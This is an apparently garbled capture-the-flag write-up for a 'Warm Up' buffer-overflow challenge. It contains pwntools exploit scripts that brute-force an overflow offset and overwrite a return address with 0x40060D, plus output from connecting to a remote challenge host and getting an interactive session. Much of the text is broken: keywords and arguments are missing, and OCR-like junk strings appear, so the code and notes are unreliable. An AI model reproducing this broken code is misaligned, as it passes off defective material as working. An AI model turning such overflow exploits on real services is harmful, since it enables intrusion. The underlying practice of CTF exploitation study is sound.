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from pwn import
addr=0x40060D
def send(sh,form,num):

payload num
if form 1:
payload+=p64(addr)

if form 2:
payload+=p32(addr)
sh.sendlineafter( ,payload)

exp():
for j in (2):
for i in (0x100) :
print (1)
sh=remote(
try:
send(sh,j+1,1)
print sh.recv()
sh.interactive()
except:

sh.close()

i=64j=1
[+] Opening connection to 124.126.19.186 on port 50311: Done
-Warm Up-

[*] Switching to interactive mode
WOW: 0x40060d
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WEwfflag, BT UEES Flen(payload)=64+8. 1 LU E A 7 i i 5 —Fhpayload="a"*72+p32(addr). & _Ff
payload=‘a’*72+p64(addr).

HIiFexp

from pwn import

2ddr=0x40060D

sh=remote( 5
payload 72 + p64(addr)

sh.sendline(payload)

sh.interactive()
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